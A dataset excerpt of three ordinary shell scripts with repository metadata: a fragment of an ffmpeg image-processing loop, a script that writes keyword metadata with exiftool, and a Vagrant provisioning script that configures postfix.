#ffmpeg -i image$(echo $counter).jpg -vf format=gray gray$(echo $counter).jpg
ffmpeg -i inter$(echo $counter).jpg -vf "eq=contrast=1.0:brightness=-0.05:saturation=0.75" common$(echo $counter).jpg
rm -f inter$(echo $counter).jpg
rm -f slide$(echo $counter).jpg
((counter++))
done
#ffmpeg -i $($b).jpg -vf scale=640:360 image$($b).jpg
#rm inter*
#rm slide*
| true
|
e4a11f7effec4f939c94dccce619d32389b63e3d
|
Shell
|
sidspencer/xmd-cli
|
/linux/setxmd
|
UTF-8
| 717
| 3.203125
| 3
|
[] |
no_license
|
#! /bin/bash
KWS="$1"
FILES=${@:2}
#if [[ $1 =~ \-\-fromtags ]]; then
#TAGS=$(/usr/local/bin/tag --list "${FILES}" | sed -E "s/.*[[:space:]]//")
#
#echo "Setting xmd from tags: ${TAGS}"
#
#/usr/local/bin/exiftool -overwrite_original_in_place -Subject="${TAGS}" -Keywords="${TAGS}" "${FILES}"
#else
#if [[ $1 =~ \-\-fromxmd ]]; then
#TAGS=$(/usr/local/bin/exiftool -S -Keywords "${FILES}" | sed -e "s/Keywords: //")
#
#echo "Setting tags from xmd: ${TAGS}"
#
#/usr/local/bin/tag --set "${TAGS}" "${FILES}"
#else
echo "Setting xmd: ${KWS}"
/usr/local/bin/exiftool -overwrite_original_in_place -Subject="${KWS}" -Keywords="${KWS}" "${@:2}"
#fi
#fi
| true
|
2531be38d8262ed0b588512d944f6bd0c35f4fd0
|
Shell
|
MichaelDaum/vagrant-foswiki
|
/scripts/configure-postfix.sh
|
UTF-8
| 528
| 3.015625
| 3
|
[] |
no_license
|
echo "configuring postfix"
hostname=$1
mail_relay_host=$2
mail_root_alias=$3
domain=${hostname#*.}
postfix_conf="/etc/postfix/main.cf"
if grep -q "added by vagrant" $postfix_conf; then
echo "... already configured, skipping"
exit
fi
cat <<HERE>> $postfix_conf
### added by vagrant
alias_maps = hash:/etc/postfix/aliases
alias_database = hash:/etc/postfix/aliases
myhostname = $hostname
mydomain = $domain
biff = no
# relayhost = todo
HERE
newaliases
service postfix restart >/dev/null
rc-update -q add postfix default
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.